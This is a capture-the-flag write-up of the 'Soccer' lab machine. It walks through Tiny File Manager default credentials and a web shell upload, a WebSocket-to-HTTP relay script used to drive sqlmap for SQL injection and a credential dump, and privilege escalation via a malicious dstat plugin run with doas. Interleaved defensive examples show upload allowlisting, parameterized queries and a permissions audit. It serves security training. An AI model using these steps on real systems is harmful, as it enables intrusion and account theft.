Soccer (WebSocket injection)

Target IP: 10.10.11.194
Full port scan:
Discovered open port 9091/tcp on 10.10.11.194
Discovered open port 80/tcp on 10.10.11.194
Discovered open port 22/tcp on 10.10.11.194

PORT     STATE SERVICE         VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
| 256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_ 256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
9091/tcp open xmltec-xmlmail?

Web service

Found a domain name

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.11.194
+ Target Hostname: 10.10.11.194
+ Target Port: 80
+ Start Time: 2023-06-06 17:01:09 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://soccer.htb/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ nginx/1.18.0 appears to be outdated (current is at least 1.20.1).

echo "10.10.11.194 soccer.htb" >> /etc/hosts

Directory scan

gobuster dir -u http://soccer.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k

The scan turned up a /tiny directory


searchsploit tiny file

searchsploit -m php/webapps/50828.sh

Always read a downloaded .sh script before running it, to catch destructive operations such as rm -rf *.

Weak credentials get into the admin panel

admin

admin@123


Getting a shell through the admin file upload

Reference for getting a shell: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/

Click upload: http://soccer.htb/tiny/tinyfilemanager.php?p=tiny&upload

The upload is stored at: /var/www/html/tiny/uploads/1.txt

It is reachable at: http://soccer.htb/tiny/uploads/1.txt


Capture the upload request and take a look

POST /tiny/tinyfilemanager.php?p=tiny HTTP/1.1
Host: soccer.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------34506864736846250242401144636
Content-Length: 445
Origin: http://soccer.htb
Connection: close
Referer: http://soccer.htb/tiny/tinyfilemanager.php?p=tiny&upload
Cookie: filemanager=ejpkhgbqc3462m7kvb2lq4qekf

-----------------------------34506864736846250242401144636
Content-Disposition: form-data; name="p"

tiny
-----------------------------34506864736846250242401144636
Content-Disposition: form-data; name="fullpath"

1.txt
-----------------------------34506864736846250242401144636
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/plain

1
-----------------------------34506864736846250242401144636--

No bypass is needed; the file uploads as-is.
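The following is an added example, not code from the original writeup or from Tiny File Manager: it parses the captured multipart body above (reassembled inline as constructed data, using the request's own boundary and field names) with the standard library's MIME parser, then applies the kind of server-side filename allowlist that the upload endpoint on this box is missing. The allowlist contents are an assumption.

```python
import os
from email.parser import BytesParser
from email.policy import default

# Constructed: the boundary and body of the captured upload request above,
# reassembled with the CRLF line endings they have on the wire.
BOUNDARY = "---------------------------34506864736846250242401144636"
BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="p"\r\n\r\n'
    "tiny\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="fullpath"\r\n\r\n'
    "1.txt\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="file"; filename="1.txt"\r\n'
    "Content-Type: text/plain\r\n\r\n"
    "1\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()

# Assumption: the extensions a file manager would accept for uploads;
# Tiny File Manager's own configuration is not on the page.
ALLOWED_EXTENSIONS = {"txt", "png", "jpg", "jpeg", "gif", "pdf"}


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Split a multipart/form-data body into {field name: (filename, bytes)}.
    The email package's MIME parser handles the boundary and part headers."""
    head = f'Content-Type: multipart/form-data; boundary="{boundary}"\r\n\r\n'.encode()
    msg = BytesParser(policy=default).parsebytes(head + body)
    fields = {}
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        fields[name] = (part.get_filename(), part.get_payload(decode=True))
    return fields


def upload_allowed(filename: str) -> bool:
    """Server-side check the vulnerable endpoint lacks: no path components,
    no hidden or extension-less names, and a final extension on the allowlist."""
    if not filename or "/" in filename or "\\" in filename or "\x00" in filename:
        return False
    base = os.path.basename(filename)
    if base in (".", "..") or base.startswith("."):
        return False
    root, ext = os.path.splitext(base)
    return bool(root) and ext.lower().lstrip(".") in ALLOWED_EXTENSIONS


def check_request(body: bytes, boundary: str) -> tuple:
    """Parse the body and decide whether its 'file' part would be accepted."""
    fields = parse_multipart(body, boundary)
    filename, _ = fields.get("file", (None, b""))
    return filename, upload_allowed(filename or "")


if __name__ == "__main__":
    print(check_request(BODY, BOUNDARY))
    print(upload_allowed("shell.php"), upload_allowed("../1.txt"))
```

The captured request passes the check because its filename is a plain `1.txt`; the point of the check is that the decision is made from the parsed part headers on the server, not from anything the client asserts about itself.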

Behinder file management


user.txt is at /home/player/user.txt

python3 -c 'import pty;pty.spawn("/bin/bash")'

Second round of enumeration

Running linpeas.sh produced out.txt, 138553 bytes in size.

Download out.txt to the local machine for detailed analysis.


Privilege escalation attempts (failed)

Check which sudo versions are exploitable: https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version

sudo

Only Linux systems with sudo older than 1.8.28 are affected. This system has 1.8.31, so this route does not work.

Try su root

su player asks for a password

sudo -l

uname -a, to consider kernel exploits

Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

snap

/usr/lib/snapd/snap-confine —> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)

snap version
snap 2.57.6
snapd 2.57.6
series 16
ubuntu 20.04
kernel 5.4.0-135-generic

The version is too new; this bug is not present.

suid

/usr/bin/at —> RTru64_UNIX_4.0g(CVE-2002-1614)

Starting the injection

The nginx site reveals a subdomain, so add soc-player.soccer.htb to /etc/hosts.


Register an account that can log in via signup: 123@qq.com test 123456

After logging in, we get:


Looking at the page source, there is a ws (WebSocket) service.

python3 exp.py

exp.py

from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection  # from the websocket-client package

ws_server = "ws://soc-player.soccer.htb:9091"

def send_ws(payload):
    ws = create_connection(ws_server)
    # If the server returns a response on connect, use below line
    #resp = ws.recv() # If server returns something like a token on connect you can find and extract from here

    # For our case, format the payload in JSON
    message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
    data = '{"id":"%s"}' % message

    ws.send(data)
    resp = ws.recv()
    ws.close()

    if resp:
        return resp
    else:
        return ''

def middleware_server(host_port,content_type="text/plain"):

    # Small HTTP front-end: each GET ?id=... is forwarded as one WebSocket message
    class CustomHandler(SimpleHTTPRequestHandler):
        def do_GET(self) -> None:
            self.send_response(200)
            try:
                payload = urlparse(self.path).query.split('=',1)[1]
            except IndexError:
                payload = False

            if payload:
                content = send_ws(payload)
            else:
                content = 'No parameters specified!'

            self.send_header("Content-type", content_type)
            self.end_headers()
            self.wfile.write(content.encode())
            return

    class _TCPServer(TCPServer):
        allow_reuse_address = True

    httpd = _TCPServer(host_port, CustomHandler)
    httpd.serve_forever()


print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")

try:
    middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
    pass

sqlmap

sqlmap -u "http://localhost:8081/?id=1" --risk 3 --level 5 --dbms=mysql -D soccer_db -T accounts --dump

This yields player's password; log in over ssh with it:
PlayerOftheMatch2022
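As an added example (not part of the original writeup, and not the soc-player application's server code, which the page does not show), here is the server-side pattern that makes the `{"id": ...}` WebSocket message injectable, beside the parameterized lookup that closes it. An in-memory SQLite table with constructed rows stands in for `soccer_db.accounts`; the column names and the MySQL-to-SQLite swap are assumptions.

```python
import json
import sqlite3

# Constructed rows standing in for soccer_db.accounts; the real schema is not on the page.
SAMPLE_ROWS = [
    (1, "alice@example.invalid", "alice", "<constructed-hash-1>"),
    (2, "bob@example.invalid", "bob", "<constructed-hash-2>"),
    (3, "player@example.invalid", "player", "<constructed-hash-3>"),
]


def make_db():
    """In-memory SQLite stands in for the MySQL instance behind the box."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE accounts (id INTEGER PRIMARY KEY, email TEXT, username TEXT, password TEXT)"
    )
    db.executemany("INSERT INTO accounts VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return db


def lookup_vulnerable(db, id_value):
    """The injectable pattern: the 'id' from the WebSocket message is pasted
    straight into the SQL text, so a value like '1 OR 1=1' rewrites the WHERE clause."""
    query = f"SELECT id, email, username FROM accounts WHERE id = {id_value}"
    return db.execute(query).fetchall()


def lookup_safe(db, id_value):
    """Hardened: reject anything that is not an integer, then bind it as a
    parameter so the database never parses user input as SQL."""
    try:
        ticket_id = int(id_value)
    except (TypeError, ValueError):
        return []
    return db.execute(
        "SELECT id, email, username FROM accounts WHERE id = ?", (ticket_id,)
    ).fetchall()


def handle_message(db, raw, safe):
    """Parse one '{"id": "..."}' frame, the shape exp.py above sends, and
    answer it with either the vulnerable or the hardened lookup."""
    try:
        msg = json.loads(raw)
    except (json.JSONDecodeError, TypeError):
        return []
    if not isinstance(msg, dict):
        return []
    id_value = str(msg.get("id", ""))
    lookup = lookup_safe if safe else lookup_vulnerable
    return lookup(db, id_value)


if __name__ == "__main__":
    db = make_db()
    for raw in ('{"id": "3"}', '{"id": "1 OR 1=1"}'):
        print(raw, "vulnerable ->", len(handle_message(db, raw, safe=False)), "rows;",
              "safe ->", len(handle_message(db, raw, safe=True)), "rows")
```

The WebSocket transport changes nothing about the root cause: the same string concatenation would be injectable over plain HTTP, which is exactly why the middleware trick above lets an HTTP-only tool drive it. The fix is the parameter binding and the type check, not anything at the socket layer.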

suid

doas, like sudo, lets an ordinary user run commands with root privileges.
dstat is a tool intended to replace vmstat, iostat, netstat, nfsstat and ifstat: an all-in-one system statistics utility.

cd /usr/local/share/dstat/
touch dstat_exploit.py
chmod 777 dstat_exploit.py

vi dstat_exploit.py

import os
os.system('chmod +s /usr/bin/bash')
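The escalation above only works because an unprivileged user can write into the directory dstat loads `dstat_*.py` plugins from. As an added example (not from the writeup), here is a small audit that flags plugin directories and plugin files that are group- or world-writable or not owned by the trusted uid; the `demo()` function builds a constructed plugin directory in a temp dir with one `0644` plugin next to a `0777` one, mirroring the `chmod 777` used above. The plugin directory list is an assumption based on the path the writeup uses.

```python
import os
import stat
import tempfile

# Assumption: directories where dstat looks for dstat_*.py plugins; the writeup
# uses /usr/local/share/dstat, /usr/share/dstat is the packaged location.
DEFAULT_PLUGIN_DIRS = ("/usr/local/share/dstat", "/usr/share/dstat")


def writable_by_others(mode: int) -> bool:
    """True if the group or world write bit is set."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_plugin_dirs(dirs=DEFAULT_PLUGIN_DIRS, trusted_uid=0):
    """Return (path, mode, uid) for each plugin directory or dstat_*.py file
    that is group/world-writable or not owned by trusted_uid (root by default).
    Any such entry lets a non-root user plant code that runs when a root
    invocation of dstat (for example via doas) loads the plugin."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        candidates = [d]
        for name in sorted(os.listdir(d)):
            if name.startswith("dstat_") and name.endswith(".py"):
                candidates.append(os.path.join(d, name))
        for path in candidates:
            st = os.lstat(path)
            if writable_by_others(st.st_mode) or st.st_uid != trusted_uid:
                findings.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return findings


def demo():
    """Constructed plugin directory in a temp dir: one properly permissioned
    0644 plugin beside a 0777 one named like the writeup's dstat_exploit.py."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin_dir = os.path.join(tmp, "dstat")
        os.mkdir(plugin_dir, 0o755)
        good = os.path.join(plugin_dir, "dstat_cpu.py")
        bad = os.path.join(plugin_dir, "dstat_exploit.py")
        for path in (good, bad):
            with open(path, "w") as fh:
                fh.write("# placeholder plugin body (constructed)\n")
        os.chmod(good, 0o644)
        os.chmod(bad, 0o777)
        # Files here are owned by the current user, so trust that uid for the demo.
        return audit_plugin_dirs((plugin_dir,), trusted_uid=os.getuid())


if __name__ == "__main__":
    for finding in audit_plugin_dirs():
        print("writable/untrusted dstat plugin path:", finding)
    print("demo findings:", demo())
```

On a real host the same check, run as a cron or CI step against the live directories, would have caught both the writable plugin directory and the `0777` plugin file that this chain depends on; the directory itself is checked because a writable directory lets a user create a new plugin even when every existing file is root-owned.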


dstat privilege escalation